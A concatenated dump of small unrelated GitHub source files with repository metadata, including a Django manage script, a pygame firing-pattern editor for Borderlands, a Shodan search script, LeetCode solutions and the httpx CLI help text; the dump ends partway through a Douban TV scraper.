"gopireddysurendrakumarreddy@gmail.com"
] |
gopireddysurendrakumarreddy@gmail.com
|
b1fedd640e6e1d56b61220de47933530cc15c3d4
|
a6a3f9b829c89bf0865902e41d23c801578e1aa2
|
/manage.py
|
b7887d01c45c48f3164b8b438dc6b8f2e53f0747
|
[] |
no_license
|
Ajithsingh26/celery-python
|
2b361cfc6b46aa60d2b56723f1880ee480c93b6e
|
56055fd29ac694fe570f6340940db385326a4a74
|
refs/heads/master
| 2023-07-07T21:01:49.038366
| 2021-08-04T18:08:41
| 2021-08-04T18:08:41
| 392,785,845
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 667
|
py
|
#!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
"""Run administrative tasks."""
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'mail_celery.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == '__main__':
main()
|
[
"aj@localhost.localdomain"
] |
aj@localhost.localdomain
|
03bd9e1cbe334ce7f9d854894bb3a88f503970be
|
d163ba3eaec7130e57e0e3e32814f27b38137f4f
|
/Utils/preprocessing/resize.py
|
2234ee977c76fd23c6c7a7edb027346aae21e922
|
[] |
no_license
|
zerebom/0513_make_disparity_picture_withCNN
|
e874864c2cf97fe75b5db73474b1b1b5f7f3d0c1
|
6569c59047caf80a72c7a174a3a96873de6311d2
|
refs/heads/master
| 2020-05-22T12:54:30.142109
| 2019-05-22T05:44:32
| 2019-05-22T05:44:32
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,685
|
py
|
# A stripped-down counterpart of path_changes, written for the slide images
import glob
import os
import re
from PIL import Image
from tensorflow.python.keras.preprocessing.image import load_img, img_to_array, array_to_img, ImageDataGenerator
import numpy as np
def path_changes(picture_names, parent_dic, child_dic, original_pic_paths, init_size=(1024, 1110)):
    # fetch the paths per image type (left-eye disp -> right-eye disp -> ...)
for path, pic_name in zip(original_pic_paths, picture_names):
image = Image.open(path)
if init_size:
            # used only for the disparity maps
            image = image.resize(init_size)
        # parent_dir / per-image-type dir / image_name.png
os.makedirs(child_dic, exist_ok=True)
image.save( child_dic + r'\\' + pic_name)
if __name__ == "__main__":
L_original_pic_paths=glob.glob(r'C:\Users\icech\Desktop\lab2019\2019_4\Data\slide_dis\Modify\Left_slide\*')
R_original_pic_paths = glob.glob(r'C:\Users\icech\Desktop\lab2019\2019_4\Data\slide_dis\Modify\Right_slide\*')
parent_dic = r'C:\Users\icech\Desktop\lab2019\2019_4\Data\slide_dis\Modify'
picture_names = [re.sub(r'.+\\', '', x) for x in L_original_pic_paths]
child_dic_L=r'C:\Users\icech\Desktop\lab2019\2019_4\Data\slide_dis\Modify\Left_slide2'
child_dic_R=r'C:\Users\icech\Desktop\lab2019\2019_4\Data\slide_dis\Modify\Right_slide2'
path_changes(picture_names, parent_dic, child_dic_L, L_original_pic_paths, init_size=(1024, 1110))
path_changes(picture_names, parent_dic, child_dic_R, R_original_pic_paths, init_size=(1024, 1110))
|
[
"ice.choco.pudding.kokoro@gmail.com"
] |
ice.choco.pudding.kokoro@gmail.com
|
1c7d4a57163cafb2d66c7657345ef2dfc466f870
|
1c37991316f22c4b804d2ca2232fc6335539e38a
|
/venv/Scripts/easy_install-3.5-script.py
|
3ddd10162ea5ec8975c5d83a34be3c6066075ef0
|
[] |
no_license
|
DUTZXD/MLHW2
|
363846b0e11bd4a8711d8393ff8a3f8efb4a4736
|
c85f3abc264bbfcf18ba4922587395c776a516b9
|
refs/heads/master
| 2022-10-20T10:22:27.704358
| 2020-06-10T00:02:30
| 2020-06-10T00:02:30
| 270,972,394
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 446
|
py
|
#!"F:\Pycharm Project\MLHW2\venv\Scripts\python.exe"
# EASY-INSTALL-ENTRY-SCRIPT: 'setuptools==40.8.0','console_scripts','easy_install-3.5'
__requires__ = 'setuptools==40.8.0'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('setuptools==40.8.0', 'console_scripts', 'easy_install-3.5')()
)
|
[
"951383631@qq.com"
] |
951383631@qq.com
|
2a2a8d2c438b23ca394b6ff90b091b17dfba1f5b
|
78a63d44d841b92fe501bfcadb2fa350077ed405
|
/modRelation/api/serializers.py
|
824e443a5c626bf9697a2d0742d390b81c0fd3fb
|
[] |
no_license
|
rmnkarkey/Django-Api
|
27513a81359ca35d46ab2c5e2a77edd5d3c2561e
|
30d640b18e7e5a7025020d3e8477b7cdd1196ded
|
refs/heads/master
| 2020-04-03T16:59:19.950310
| 2018-10-30T17:22:13
| 2018-10-30T17:22:13
| 155,427,361
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 353
|
py
|
from modRelation.models import Reporter,Article
from rest_framework import serializers
class modelsSerializers(serializers.ModelSerializer):
class Meta:
model=Reporter
fields=('id','first_name','last_name','email')
class AotherSerializer(serializers.ModelSerializer):
class Meta:
model=Article
fields=('id','headline','pub_date','reporter')
|
[
"rk.officialuser@gmail.com"
] |
rk.officialuser@gmail.com
|
3259d6d8dbe83bc7bd9396a0f051510a2dc63971
|
32911eab1e039fbba653af3d0e69005c0c3b5ec2
|
/main/main.py
|
5618fff4d2cf9e9ec37a070390e7092695139976
|
[] |
no_license
|
juso40/BL2FiringPatternEditor
|
e4a88e966f5f8f5a4133933f8ea6afec1f84f3b6
|
3aa7fe00203dfdf108f94fa2707e6304a412006f
|
refs/heads/master
| 2022-08-31T10:24:52.830769
| 2020-05-18T22:41:40
| 2020-05-18T22:41:40
| 264,648,607
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,759
|
py
|
import pygame
from copy import deepcopy
def export(points, screen_mid):
points = deepcopy(points)
p_line = "(StartPoint=(Pitch={pitch},Yaw={yaw},Roll=0),EndPoint=(Pitch=0,Yaw=0,Roll=0)," \
"bUseStartPointOnly=True," \
"CustomWaveMotion=(bUseCustomWaveMotion=False,WaveFreq=(X=0.000000,Y=0.000000,Z=0.000000)," \
"WaveAmp=(X=0.000000,Y=0.000000,Z=0.000000),WavePhase=(X=0.000000,Y=0.000000,Z=0.000000))),"
with open("exportedFiringPattern.txt", "w+") as f:
f.write("set FiringModeDefinition FiringPatternLines (")
for point in points:
point.x -= screen_mid.x
point.y = screen_mid.y - point.y
f.write(p_line.format(pitch=int(point.y * 20), yaw=int(point.x * 20)))
f.seek(f.tell() - 1)
f.write(")")
str_help = "LMB: New Point RMB: Remove last Point G: Toggle through Grids X/Y: Clone on X/Y axis Enter: Save to " \
"'exportedFiringPattern.txt'"
pygame.init()
pygame.display.set_caption("BL Firing Pattern Editor")
black = (0, 0, 0)
white = (255, 255, 255)
grey = (190, 190, 190)
light_blue = (100, 100, 155)
red = (255, 0, 0)
green = (0, 255, 0)
blue = (0, 0, 255)
X, Y = 1280, 720
grids = ((1, 1), (16, 9), (32, 18), (64, 36))
curr_grid = 0
display_surface = pygame.display.set_mode((X, Y))
image = pygame.transform.scale(pygame.image.load("BL2FiringPatternBG.png"), display_surface.get_rect()[2:])
my_font = pygame.font.SysFont("Arial.ttf", 24)
help_text = my_font.render(str_help, True, green)
help_text_bg = my_font.render(str_help, True, black)
middle = pygame.Vector2(display_surface.get_rect()[2] / 2, display_surface.get_rect()[3] / 2)
clock = pygame.time.Clock()
pattern_points = [] # store our Vector2 of pattern points
b_clone_y = False
b_clone_x = False
b_snap = False
while True:
display_surface.blit(image, (0, 0))
# show grid
for x in range(0, X, X // grids[curr_grid][0]):
pygame.draw.line(display_surface, light_blue, (x, 0), (x, Y))
for y in range(0, Y, Y // grids[curr_grid][1]):
pygame.draw.line(display_surface, light_blue, (0, y), (X, y))
# show x/y help lines if needed
if b_clone_x:
pygame.draw.line(display_surface, green, (0, Y // 2), (X, Y // 2))
if b_clone_y:
pygame.draw.line(display_surface, blue, (X // 2, 0), (X // 2, Y))
# Display our help text
display_surface.blit(help_text_bg, (1, 0))
display_surface.blit(help_text_bg, (-1, 0))
display_surface.blit(help_text_bg, (0, 1))
display_surface.blit(help_text_bg, (0, -1))
display_surface.blit(help_text, (0, 0))
# mid crosshair
pygame.draw.line(display_surface, red, middle, (middle.x, middle.y + 20), 1)
pygame.draw.line(display_surface, red, middle, (middle.x, middle.y - 20), 1)
pygame.draw.line(display_surface, red, middle, (middle.x + 20, middle.y), 1)
pygame.draw.line(display_surface, red, middle, (middle.x - 20, middle.y), 1)
for event in pygame.event.get():
if event.type == pygame.QUIT:
pygame.quit()
quit()
elif event.type == pygame.MOUSEBUTTONUP and event.button == 3: # Right click remove last point
if pattern_points:
pattern_points.pop()
elif event.type == pygame.MOUSEBUTTONUP and event.button == 1: # Left click add new point
pos = pygame.Vector2(*pygame.mouse.get_pos())
# calc optional snap location
if b_snap and curr_grid > 0:
                # I'll keep this as an optional ToDo :)
pass
pattern_points.append(pos)
if b_clone_y and b_clone_x:
new_pos = pygame.Vector2()
if pos.x > middle.x:
new_pos.x = (middle.x - (pos.x - middle.x))
elif pos.x < middle.x:
new_pos.x = (middle.x + (middle.x - pos.x))
if pos.y > middle.y:
new_pos.y = (middle.y - (pos.y - middle.y))
elif pos.y < middle.y:
new_pos.y = (middle.y + (middle.y - pos.y))
pattern_points.append(new_pos)
elif b_clone_y:
if pos.x > middle.x:
pattern_points.append(pygame.Vector2(middle.x - (pos.x - middle.x), pos.y))
elif pos.x < middle.x:
pattern_points.append(pygame.Vector2(middle.x + (middle.x - pos.x), pos.y))
elif b_clone_x:
if pos.y > middle.y:
pattern_points.append(pygame.Vector2(pos.x, (middle.y - (pos.y - middle.y))))
elif pos.y < middle.y:
pattern_points.append(pygame.Vector2(pos.x, (middle.y + (middle.y - pos.y))))
elif event.type == pygame.KEYUP:
if event.key == pygame.K_RETURN: # Export all the current points to txt
export(pattern_points, middle)
elif event.key == pygame.K_g:
curr_grid = (curr_grid + 1) % len(grids)
elif event.key == pygame.K_y or event.key == pygame.K_z:
b_clone_y = not b_clone_y
elif event.key == pygame.K_x:
b_clone_x = not b_clone_x
elif event.key == pygame.K_s:
b_snap = not b_snap
# Draw our pattern points
for point in pattern_points:
pygame.draw.line(display_surface, white, point, (point.x, point.y + 5), 1)
pygame.draw.line(display_surface, white, point, (point.x, point.y - 5), 1)
pygame.draw.line(display_surface, white, point, (point.x + 5, point.y), 1)
pygame.draw.line(display_surface, white, point, (point.x - 5, point.y), 1)
# update our screen
clock.tick(30)
pygame.display.flip()
|
[
"justin.sostmann@googlemail.com"
] |
justin.sostmann@googlemail.com
|
ce077575cd036ba0e120e0d021597f7c91824a8c
|
d692146094664ee7affd3c20664f7493ec4edd93
|
/shodan-monitor.py
|
b1e9e3212d68ddae7c046e44bbfcc97c713105ad
|
[] |
no_license
|
happostroph/shodan-monitor
|
be1c775fd69fdb5614365986733d425dc00136d6
|
ff500423c60b6edc13e89df7162a4b7adf696424
|
refs/heads/master
| 2020-09-25T17:06:33.131424
| 2019-12-05T11:22:22
| 2019-12-05T11:22:22
| 226,050,381
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 506
|
py
|
import shodan
import os
SHODAN_API_KEY = os.environ.get("SHODAN_API_KEY")
api = shodan.Shodan(SHODAN_API_KEY)
query = ""
try:
# Search Shodan
results = api.search(query)
# Show the results
print('Results found: {}'.format(results['total']))
for result in results['matches']:
print('IP: {}'.format(result['ip_str']))
print('Open port: {}'.format(result['port']))
except shodan.APIError as err :
print('Error: {}'.format(err))
|
[
"maxime.neuville@viacesi.fr"
] |
maxime.neuville@viacesi.fr
|
7476c30898cb71816f6f69ab81cf15673391f27d
|
99e6430dcdf0ed64b2501b3faab4dbbfee73b245
|
/projects/migrations/0002_auto_20170430_1206.py
|
59c651455daa4647da9ef970aed038fb5ed8f50e
|
[] |
no_license
|
Shriram-N/social-app-django
|
63df2d40f0675e6ca55a044aec267dd04b2f3a25
|
321f5bfc3584d5a45bf7ff42c1892987ab1d394f
|
refs/heads/master
| 2021-01-20T07:48:22.763833
| 2017-05-02T15:07:34
| 2017-05-02T15:07:34
| 90,046,663
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 489
|
py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
from django.conf import settings
class Migration(migrations.Migration):
dependencies = [
('projects', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='projects',
name='creator',
field=models.ForeignKey(to=settings.AUTH_USER_MODEL, null=True),
preserve_default=True,
),
]
|
[
"shreeram51091@gmail.com"
] |
shreeram51091@gmail.com
|
34a7d81b8fedbc037428cff8816bbb4e0e284f73
|
c4b607b5d777ce58303ebbff6acfa9337a9f3f52
|
/ex04/ran_langd.py
|
d798a45454e3f8e00caf127fa277b14094d6c5ee
|
[] |
no_license
|
Ran4/dd1331-public
|
ee30f64809f2f34e68c3541c33ee2fd5a951a7bd
|
f15f94254d89735b052f7eba2d58c6b0c4923dd8
|
refs/heads/master
| 2020-04-18T18:27:35.432204
| 2016-10-03T18:06:20
| 2016-10-03T18:06:20
| 66,838,114
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 84
|
py
|
def length(seq):
if not seq:
return 0
return 1 + length(seq[1:])
|
[
"rasmus.ansin@gmail.com"
] |
rasmus.ansin@gmail.com
|
948a686715d703467866c5599a5c5afdc1c4cdf9
|
dd2fd93032421157319f96bd42906bc7f80e999c
|
/httpx_cli/_help.py
|
ce9e07ed3f00f9f0b524621a5916491ccc105300
|
[] |
no_license
|
steven-howa/httpx-cli
|
aa197e0e6d689717e0ca552dff0ccd1d14bdb3a9
|
129db30a7e211b249690ee3d31fae0fee5a0aa6d
|
refs/heads/master
| 2022-12-19T20:38:17.334774
| 2020-09-25T10:17:15
| 2020-09-25T10:17:15
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,752
|
py
|
from rich.console import Console
from rich.table import Table
def print_help() -> None:
console = Console()
console.print("[bold]HTTPX :butterfly:", justify="center")
console.print()
console.print("A next generation HTTP client.", justify="center")
console.print()
console.print("Usage: [bold]httpx[/bold] [cyan]<URL> ...[/cyan] ", justify="left")
console.print()
table = Table.grid(padding=1, pad_edge=True)
table.add_column("Parameter", no_wrap=True, justify="left", style="bold")
table.add_column("Description")
table.add_row(
"-m, --method [cyan]METHOD",
"Request method, such as GET, POST, PUT, PATCH, DELETE, OPTIONS, HEAD. [Default: GET]",
)
table.add_row(
"-p, --params [cyan]<NAME VALUE> ...",
"Query parameters to include in the request URL.",
)
table.add_row(
"-c, --content [cyan]TEXT", "Byte content to include in the request body."
)
table.add_row(
"-d, --data [cyan]<NAME VALUE> ...", "Form data to include in the request body."
)
table.add_row(
"-f, --files [cyan]<NAME FILENAME> ...",
"Form files to include in the request body.",
)
table.add_row("-j, --json [cyan]TEXT", "JSON data to include in the request body.")
table.add_row(
"-h, --headers [cyan]<NAME VALUE> ...",
"Include additional HTTP headers in the request.",
)
table.add_row(
"--cookies [cyan]<NAME VALUE> ...", "Cookies to include in the request."
)
table.add_row(
"-a, --auth [cyan]<USER PASS>",
"Username and password to include in the request. Specify '-' for the password to use "
"a password prompt. Note that using --verbose/-v will expose the Authorization "
"header, including the password encoding in a trivially reverisible format.",
)
table.add_row(
"--proxy [cyan]URL",
"Send the request via a proxy. Should be the URL giving the proxy address.",
)
table.add_row(
"-t, --timeout [cyan]FLOAT",
"Timeout value to use for network operations, such as establishing the connection, "
"reading some data, etc... [Default: 5.0]",
)
table.add_row("--no-allow-redirects", "Don't automatically follow redirects.")
table.add_row("--no-verify", "Disable SSL verification.")
table.add_row(
"--http2", "Send the request using HTTP/2, if the remote server supports it."
)
table.add_row(
"--download", "Save the response content as a file, rather than displaying it."
)
table.add_row("-v, --verbose", "Verbose output. Show request as well as response.")
table.add_row("--help", "Show this message and exit.")
console.print(table)
|
[
"tom@tomchristie.com"
] |
tom@tomchristie.com
|
d52d3ad533846709d2d0bfadb07a750fe00f9d02
|
09630fcab1b1c4739010a389438bf174182fa42e
|
/Interview Practice/productOfArrayExceptSelf.py
|
abf446977a51c0ddf1d10ef2f0e824f3506e3301
|
[] |
no_license
|
zanewebb/codebreakerspractice
|
1e28bd6b9c1f78fd5306784848edfb5dd746e235
|
e8e2834f8edcd8c9732be603b0b6038c8fd88fa0
|
refs/heads/master
| 2021-04-23T03:17:40.229930
| 2020-10-07T02:11:14
| 2020-10-07T02:11:14
| 249,893,478
| 0
| 0
| null | 2020-06-22T21:34:05
| 2020-03-25T05:20:35
|
Python
|
UTF-8
|
Python
| false
| false
| 1,945
|
py
|
# so close; shouldn't have tried setting the initial rolling prod to a value other than 1
from typing import List

class Solution:
def productExceptSelf(self, nums: List[int]) -> List[int]:
if len(nums) <= 1:
return nums
output = [0] * len(nums)
output[0] = 1
for i in range(1,len(nums)):
output[i] = nums[i-1] * output[i-1]
rollingprod = 1
for i in range(len(nums)-1, -1, -1):
output[i] *= rollingprod
rollingprod *= nums[i]
return output
# approved answer
# the trick is to do just two passes: one where you populate each index with the rolling product of everything to its left;
# the second pass keeps track of the rolling product from the right, multiplies that into each output index, and that's it
class Solution:
def productExceptSelf(self, nums: List[int]) -> List[int]:
output = [0] * len(nums)
output[0] = 1
for i in range(1, len(nums)):
output[i] = output[i-1]*nums[i-1]
rollingprod = 1
for i in range(len(nums)-1, -1, -1):
output[i] = output[i] * rollingprod
rollingprod *= nums[i]
return output
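# Worked example of the two passes for nums = [1, 2, 3, 4] (values illustrative):
#   left pass:  output = [1, 1, 2, 6]   (product of everything left of each index)
#   right pass: rollingprod takes 1, 4, 12, 24 walking right-to-left, giving
#               output = [24, 12, 8, 6] (product of all elements except self)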
# PLEASE NOTE THAT THIS SOLUTION IS INVALID
# ONE REQUIREMENT OF THIS PROBLEM IS THAT IT MUST BE O(N), THIS IS O(N^2)
# MUST NOT USE DIVISION TO SOLVE THIS
class Solution:
def productExceptSelf(self, nums: List[int]) -> List[int]:
output = [None]*len(nums)
rollingprod = 1
for i in range(0, len(nums)):
tempprod = 1
for j in range(i+1, len(nums)):
if j < len(nums):
tempprod *= nums[j]
output[i] = tempprod * rollingprod
rollingprod *= nums[i]
return output
|
[
"zane.webb97@gmail.com"
] |
zane.webb97@gmail.com
|
926c9d597e451bbae91d1f4dfc0b1fac5892ff2b
|
fda2fb357f0138140e98346f0a37b15a81a01093
|
/DiskSpace_Linux.py
|
3b567e46701347df2f8c80f9f9206adfe285ec2d
|
[] |
no_license
|
Ashwini1001/AutoDesk-Projects
|
de6b7d2314f246560ed95cdc56255c6efc713e9a
|
b4eb9fcab1dfdb6482ea06b9895c48edda540bfb
|
refs/heads/master
| 2020-04-04T18:22:43.618456
| 2018-11-05T04:36:51
| 2018-11-05T04:36:51
| 156,161,271
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 11,195
|
py
|
import paramiko, socket, os, boto3, json, requests, base64, pysnow, logging, inspect, warnings, substring
from paramiko import SSHException
from BeautifulSoup import BeautifulSoup
from base64 import b64decode
from requests.auth import HTTPBasicAuth
def Credentials():
try:
ENCRYPTED = os.environ['ssurl']
ssurl = boto3.client('kms').decrypt(CiphertextBlob=b64decode(ENCRYPTED))['Plaintext']
ENCRYPTED = os.environ['ssgetsec']
ssgetsec = boto3.client('kms').decrypt(CiphertextBlob=b64decode(ENCRYPTED))['Plaintext']
ENCRYPTED = os.environ['suser']
suser = boto3.client('kms').decrypt(CiphertextBlob=b64decode(ENCRYPTED))['Plaintext']
ENCRYPTED = os.environ['spass']
spass = boto3.client('kms').decrypt(CiphertextBlob=b64decode(ENCRYPTED))['Plaintext']
ENCRYPTED = os.environ['Snowinstance']
Snowinstance = boto3.client('kms').decrypt(CiphertextBlob=b64decode(ENCRYPTED))['Plaintext']
ENCRYPTED = os.environ['sid']
sid = boto3.client('kms').decrypt(CiphertextBlob=b64decode(ENCRYPTED))['Plaintext']
ENCRYPTED = os.environ['snsid']
snsid = boto3.client('kms').decrypt(CiphertextBlob=b64decode(ENCRYPTED))['Plaintext']
headers = {
"Content-Type": "application/x-www-form-urlencoded"
}
creds = {
"username": suser,
"password": spass,
"organization": "",
"domain": "ads"
}
resp = requests.post(ssurl, data=creds, headers=headers, verify=False)
sresp = resp.content
Soup = BeautifulSoup
soup = Soup(sresp)
token = soup.find('token').string
secret = {
"secretId": sid,
"token": token
}
s = requests.post(ssgetsec, data=secret, headers=headers, verify=False)
strs = s.content
soup = Soup(strs)
username = soup.findAll("value")
i = 0
for user in username:
if i == 0:
i = i + 1
elif i <= 2:
strval = user.string
if "svc" in strval:
cuser = strval
else:
cpwd = strval
i = i + 1
snowresp = requests.post(ssurl, data=creds, headers=headers, verify=False)
ssnowresp = snowresp.content
Soup1 = BeautifulSoup
soup1 = Soup1(ssnowresp)
snowtoken = soup1.find('token').string
snowsecret = {
"secretId": snsid,
"token": snowtoken
}
snowurl = requests.post(ssgetsec, data=snowsecret, headers=headers, verify=False)
strsnowurl = snowurl.content
soup1 = Soup(strsnowurl)
SnowUsername = soup1.findAll("value")
i = 0
for u in SnowUsername:
if i == 0:
i = i + 1
elif i <= 2:
SnowString = u.string
if "svc" in SnowString:
snowuser = SnowString
else:
snowpwd = SnowString
i = i + 1
return cuser,cpwd,snowuser,snowpwd,Snowinstance
except Exception as e:
logging.warning("Warning at Credentials()...!" + str(e))
def SSHSession(IpAddress):
cuser,cpwd,snowuser,snowpwd,Snowinstance = Credentials()
try:
LinuxInstance = paramiko.SSHClient()
LinuxInstance.set_missing_host_key_policy(paramiko.AutoAddPolicy())
LinuxInstance.connect(hostname = IpAddress, username = cuser, password = cpwd)
        return LinuxInstance
        # NOTE: the original called LinuxInstance.close() here, after the
        # return, which never executes; callers must close the session themselves
except paramiko.ssh_exception.NoValidConnectionsError:
print "IP does not belong to linux"
print "Message: Bot execution failed"
except paramiko.ssh_exception.AuthenticationException:
print "Authentication Error! Invalid username/password..."
print "Message: Bot execution failed"
except paramiko.ssh_exception.SSHException:
print "Unable to SSH! ..."
print "Message: Unable to initiate SSH"
def MainMethod(IpAddress, cmd ):
    ''' Run a command over the SSH session and return its decoded output '''
try:
stdin, stdout, stderr = SSHSession(IpAddress).exec_command(cmd)
Output = stdout.read().decode('ascii').strip("\n")
return Output
except AttributeError:
print "Unable to execute commands..!"
print "Message: Bot execution failed"
except SSHException:
print "SSH session is not active..!"
print "Message: Bot execution failed"
def lambda_handler(event, context):
'''Method to run commands'''
cuser,cpwd,snowuser,snowpwd,Snowinstance = Credentials()
print event
Des = []
for alert in (event.get("incident")).get("alerts"):
for tag in (alert.get("tags")):
if tag.get("name") == "ip":
EventIpAddress = tag.get("value").encode("utf-8")
print "The ip is:", EventIpAddress
for alert in (event.get("incident")).get("alerts"):
for tag in (alert.get("tags")):
if tag.get("name") == "host":
HostName = tag.get("value").encode("utf-8")
print "The hostname is:", HostName
for alert in (event.get("incident")).get("alerts"):
for tag in (alert.get("tags")):
if tag.get("name") == "short_description":
ShortDescription = tag.get("value").encode("utf-8")
print "The short description is:", ShortDescription
path = substring.substringByChar(ShortDescription, startChar="/", endChar=" ")
print "The path is:", path
if (event.get("incident")["changedOn"]) == (event.get("incident")["startedOn"]):
SnowSysId = event.get("shareResults").get("servicenowSysId")
print SnowSysId
else:
for result in (((event.get("shareResults")).get("result"))):
SnowSysId = (result).get("sys_id").encode("utf-8")
print SnowSysId
Disk = []; File = [];WorkState = [];CollectorOutput = [];SNMP = []; ReadOnlyStatusInfo = []
''' Method to get the Linux Version '''
LinuxVersion = MainMethod(EventIpAddress, "cat /etc/redhat-release")
''' Method to get overall disk status '''
OverallDiskStatus = MainMethod(EventIpAddress, "df -h | sort -hr | head -n 10")
''' Method is to get disk status pertaining to the path'''
DiskStatus = MainMethod(EventIpAddress, "df -h " + path + " | sort -hr | head -n 10")
    ''' Get the largest files under the path '''
LargeFiles = MainMethod(EventIpAddress, "ls -lh " + path + " | sort -hr | head -n 3" )
''' Method to get list of open files '''
ListOfOpenFiles = MainMethod(EventIpAddress, "/usr/sbin/lsof " + path)
''' Method to get disk I/O information '''
DiskInfo = MainMethod(EventIpAddress,"iostat | head -n 20")
'''*********************HEALTHCHECK**********************'''
RoutingTable = MainMethod(EventIpAddress, "netstat -r")
    stdin, stdout, stderr = SSHSession(EventIpAddress).exec_command("awk '$4 ~ " + "^ro" + "&& $3 !~ " + "(squashfs|iso9660|nfs|cifs|tmpfs|sysfs)" + "{print $0}' /proc/mounts")
    ReadOnlylines = stdout.readlines()
    # FileInfo is appended below, so it must be computed first (the original
    # defined it after its first use, which raised a NameError on that path)
    FileInfo = MainMethod(EventIpAddress, "awk '$4 ~ " + "^ro" + "&& $3 !~ " + "(squashfs|iso9660|nfs|cifs|tmpfs|sysfs)" + "{print $0}' /proc/mounts")
    if ReadOnlylines == []:
        ReadOnlyStatus = "No read-only file information"
        ReadOnlyStatusInfo.append(ReadOnlyStatus)
    else:
        ReadOnlyStatusInfo.append(FileInfo)
    TcpConnection = MainMethod(EventIpAddress, "netstat -t --listening")
ZombieProcessList = MainMethod(EventIpAddress, "ps aux | grep Z | grep -vE " + '"grep|ps aux"')
InodeInfo = MainMethod(EventIpAddress, "df -i")
MemInfo = MainMethod(EventIpAddress, "free -m")
SwapInfo = MainMethod(EventIpAddress, "/sbin/swapon --summary")
RebootInfo = MainMethod(EventIpAddress, "last reboot | head -3")
ShutdownInfo = MainMethod(EventIpAddress, "last -x | grep shutdown | head -3")
CpuInfo = MainMethod(EventIpAddress, "ps -eo pcpu,pid,user,args | sort -k 1 -r | head -6")
'''Comments to be updated'''
LinuxVer = "The linux version is :" + '\r\n ' + LinuxVersion
Overall = "The overall disk status is:" + '\r\n' + OverallDiskStatus
Disk = "The disk status information pertaining to the path is :" + '\r\n' + DiskStatus
Large = "The list of files consuming more space is :" + '\r\n' + LargeFiles
OpenFiles = "The list of open files in the directory is :" + '\r\n' + ListOfOpenFiles
DiskInf = "The disk I/O information is : " + '\r\n ' + DiskInfo
RoutingTableInfo = "The routing table information is:" + '\r\n' + RoutingTable
TcpConnectionInfo = "The active tcp connections are :" + '\r\n' + TcpConnection
FileInformation = "The read-only file information is:" + '\r\n' + ("\n".join(ReadOnlyStatusInfo))
DiskInformation = "The disk information is:" + '\r\n' + DiskInfo
ZombieInformation = "The zombie process information is:" + '\r\n' + ZombieProcessList
InodeInforation = "The inode information is :" + '\r\n' + InodeInfo
MemoryInformation = "The memory information is :" + '\r\n' + MemInfo
SwapInformation = "The swap information is :" + '\r\n' + SwapInfo
RebootInformation = "The last reboot information is :" + '\r\n' + RebootInfo
ShutdownInformation = "The shutdown information is :" + '\r\n' + ShutdownInfo
Top5Cpu = "The top 5 processes consuming memory is :" + '\r\n' + CpuInfo
comments = (LinuxVer + '\r\n'*2 + Overall + '\r\n'*2 + Disk + '\r\n'*2 + Large + '\r\n'*2 + OpenFiles + '\r\n'*4 + DiskInf + '\r\n'*2 +
            "HEALTHCHECK" + '\r\n'*2 + RoutingTableInfo + '\r\n'*2 + TcpConnectionInfo + '\r\n'*2 + FileInformation + '\r\n'*2 +
            DiskInformation + '\r\n'*2 + ZombieInformation + '\r\n'*2 + InodeInformation + '\r\n'*2 + MemoryInformation + '\r\n'*2 +
            SwapInformation + '\r\n'*2 + RebootInformation + '\r\n'*2 + ShutdownInformation + '\r\n'*2 + Top5Cpu)
print comments
connect_to_snow = pysnow.Client(instance = Snowinstance, user = snowuser, password = snowpwd)
incident = connect_to_snow.resource(api_path='/table/incident')
response = incident.get(query={'sys_id': SnowSysId})
update = response.update({'comments': comments})
update = response.update({'assignment_group': 'DES Unix Operations'})
update = response.update({'assigned_to': 'Autobots'})
update = response.update({'incident_state': 'Awaiting Assignment'})
if update:
    print "Update on SNOW successful!"
    print "Message: Bot executed successfully"
else:
    print "Update on SNOW not successful!"
    print "Message: Bot execution failed"
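# --- Sketch: the MainMethod/SSHSession helpers used above are defined earlier in
# --- this bot. A minimal paramiko-based equivalent is shown here for reference;
# --- the credential handling below is an illustrative assumption, not the original.
import paramiko

def SSHSession(ip_address):
    client = paramiko.SSHClient()
    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    # hypothetical credentials; the real bot presumably loads these from config
    client.connect(ip_address, username="autobot", password="change-me")
    return client

def MainMethod(ip_address, command):
    # Run a single command over SSH and return its stdout as one string.
    stdin, stdout, stderr = SSHSession(ip_address).exec_command(command)
    return "".join(stdout.readlines())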
|
[
"noreply@github.com"
] |
Ashwini1001.noreply@github.com
|
afc6f056f049b0bd214ece662c0a08b2cf31852f
|
c7a4c41aa2d2ab17840f6fd8d46ca00c10062f93
|
/豆瓣电视剧_分页.py
|
98562a3b15f68a2ac1e691078280f48f416fd12e
|
[] |
no_license
|
pythonhqw/douban
|
e56e8a58f1b4075698fc8ce6cb643d44d833f121
|
47539dc9f8b9a086a837cf000d8f92bf3b0bdee8
|
refs/heads/master
| 2020-03-19T13:27:59.370307
| 2018-06-20T08:58:23
| 2018-06-20T08:58:23
| 136,580,752
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,520
|
py
|
import requests
import json
class DouBanDSJSpider(object):
def __init__(self):
# Prepare the request data
# Request URL
self.url = 'https://m.douban.com/rexxar/api/v2/subject_collection/filter_tv_{}_hot/items?start={}&count=18&loc_id=108288'
# Request headers
# The Referer changes with the TV series category:
# domestic dramas: chinese, Hong Kong dramas: hongkong, animation: animation
self.headers = {
